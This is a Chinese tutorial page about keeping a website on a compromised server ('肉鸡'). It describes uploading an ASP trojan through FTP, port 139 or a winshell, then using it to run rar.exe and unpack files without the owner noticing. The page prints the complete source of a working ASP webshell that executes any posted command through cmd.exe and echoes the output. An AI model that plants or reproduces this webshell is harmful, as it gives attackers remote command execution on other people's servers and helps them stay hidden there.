学院首页 软件应用 编程开发 创意设计 认证培训 软件论坛
ASP ASP.NET PHP JSP SQL MYSQL Java VB

您的位置:学院 >> 编程开发 >> ASP >> 用ASP木马实现FTP和解压缩


用ASP木马实现FTP和解压缩


在肉鸡上放网站最麻烦的可能就是更新和上传大量的文件了,终端服务大白天容易被发现,自己开个ftp又不放心.自己在网上转了一圈发现通过结合无组件上传和asp木马可以轻松实现.

  asp木马大家都很熟悉,无非就是一个cmd,有什么作用啊,你别急,听我慢慢说嘛.整体思路就是先通过ftp,139,或者winshell上传一个无组件asp程序.我选择了化境的webedit(其实这个已经不是一个单纯的无组件上传的工具了,通过它还可以修改,删除文件/目录,可以用来更新页面喔,作起来广告了,我跟他没亲戚啊,闪过一个flying bottle..继续)和一个asp木马(如果,实在懒得找.最后带着源码,粘贴另存为asp文件即可),记住可都要在肉鸡的web目录喔.其实大多的问题webedit都可以解决,不过如果有很多文件一个一个上传可就麻烦了,怎么办?这下asp木马用上了.找一个rar.exe(所有装过了winrar的目录都有,说不定肉鸡上已经安好了,如果是别的命令行的解压缩工具也可以喔)把它拷到%SystemRoot%\system32\下.上传.zip或者.rar文件到该肉鸡的web目录.在浏览器地址栏里打开asp木马(暂时称之为trojan.asp),在text文本框里输入rar -x source.rar path解压缩成功,V,且慢如何得到web目录的绝对路径(path)呢?我用的是用土方法,修改trojan.asp加入一行转换虚拟目录成绝对路径并输出的语句<% =server.mappath(".") %>,"."可以随意改成任何的相对虚拟目录.

  只是提供一个思路,如果哪个牛人可写一个asp的解压缩那更好喽,不过?谁会呢,我不会,你会吗?至于如何隐藏虚拟目录,支持简体中文显示等就不是该篇的讨论之列了,老话,安全第一,一般放个小的论坛或聊天室就可以了,如果真放个个人主页,还把自己的联系地址,电话号码也留给人家就不太好了.ps.junesun建议直接作成自解压,不知会不会弹出对话框。

  --------以下是asp木马的源码,建议在<html>后加上<% =server.mappath(".") %>------------------------------

<%@ Language=VBScript %>
<%
 Dim oScript
 Dim oScriptNet
 Dim oFileSys, oFile
 Dim szCMD, szTempFile

 On Error Resume Next
 <

  ' -- create the COM objects that we will be using -- '
  Set oScript = Server.createObject("WSCRIPT.SHELL")
  Set oScriptNet = Server.createObject("WSCRIPT.NETWORK")
  Set oFileSys = Server.createObject("Scripting.FileSystemObject") <

  ' -- check for a command that we have posted -- '
  szCMD = Request.form(".CMD")
  If (szCMD <> "") Then <

   ' -- Use a poor man's pipe ... a temp file -- '
   szTempFile = "C:\" & oFileSys.GetTempName( )
   Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
   Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) <

  End If <

%>
<HTML>
<BODY>
 <form action="<%= Request.ServerVariables("URL") %>" method="POST">
  <input type=text name=".CMD" size=45 value="<%= szCMD %>">
  <input type=submit value="Run">
 </form>
<PRE> <

 <%
  If (IsObject(oFile)) Then
   ' -- Read the output from our command and remove the temp file -- '
   On Error Resume Next
   Response.Write Server.HTMLEncode(oFile.ReadAll)
   oFile.Close
   Call oFileSys.deleteFile(szTempFile, True)
  End If
 %>
</BODY>
</HTML>

技术文章快速查找

栏目导航
软件应用
·操作系统 ·杀毒防黑 ·应用软件
·聊天软件 ·网络软件  
Web开发
·ASP ·JavaScript ·CGI
·JSP ·VbScript ·Web服务器
·PHP ·XML  
开发语言
·VB ·VC ·ASP.NET
·Java ·C/C++ ·Delphi
数据库开发
·MySQL ·SQL/Access ·PowerBuilder
·Oracle ·DB2  
网站设计
·Flash ·Dreamweaver ·HTML/CSS
·Fireworks ·FrontPage  
平面设计
·Photoshop ·CorelDraw ·AutoCAD
·FreeHand ·Illustrator ·3DsMAX
媒体动画
·Director ·Authorware ·Maya
·视频处理    


相关软件 产品库推荐
·笔记本 ·台式机 ·服务器
·数码相机 ·手机 ·GPS
·DV摄像机 ·MP3 ·MP4
·CPU ·硬盘 ·内存
·主板 ·显卡 ·显示器
·打印机 ·投影机 ·路由器

怎么是VB语言的没有别的语言啊!!!!...
游客 发表于2008-6-12 11:07:00
对"用ASP木马实现FTP和解压缩"的评论 - 快速回贴
内容:
  [完成后可按Ctrl+Enter发布]

百度中 用ASP木马实现FTP和解压缩 相关内容
Google搜索中 用ASP木马实现FTP和解压缩 相关内容
雅虎中 用ASP木马实现FTP和解压缩 相关内容
Sogou搜索中 用ASP木马实现FTP和解压缩 相关内容

相关软件 最新回复帖子:

·用ASP木马实现FTP和解压缩
·翻书动画效果的制作(一)
·VB中控件大小随窗体大小变化而变化
·用Flash制作一碧万顷的湖水
·Photoshop手工绘制动物皮毛效果
·用Visual Basic设计抽奖程序
·如何用200卡拨号上网
·AutoCAD三维造型实例--篮球
·渐变背景人像照片PS抠图的一些思路
·CorelDRAW 10文本编辑操作快捷键


  相关软件 用ASP木马实现FTP和解压缩相关文章
ASP木马的原理和基本防范方法 防范ASP木马的十大基本原则
一个ASP木马程序的源代码 IIS服务器排错指南及错误代码大全
利用ASP木马程序获取管理权限 Web服务器上防范基于ASP程序的木马
ASP设计常见问题及解答精要 ASP编程中20个非常有用的例子
用ASP编写下载网页中所有资源的程序 用ASP编程实现网络内容快速查找
IIS HTTP500内部错误解决办法 ASP实用技巧:强制刷新和判断文件地址
ASP木马Webshell安全解决办案 ASP程序中提供在线文章翻译功能
在ASP应用程序中加入智能搜索 ASP无组件上传进度条解决方案
ASP中实现分页显示的七种武器 ASP开发中数据库文件调用的捷径
巧用缓存提高ASP应用程序的性能 SQL注入天书之ASP注入漏洞全接触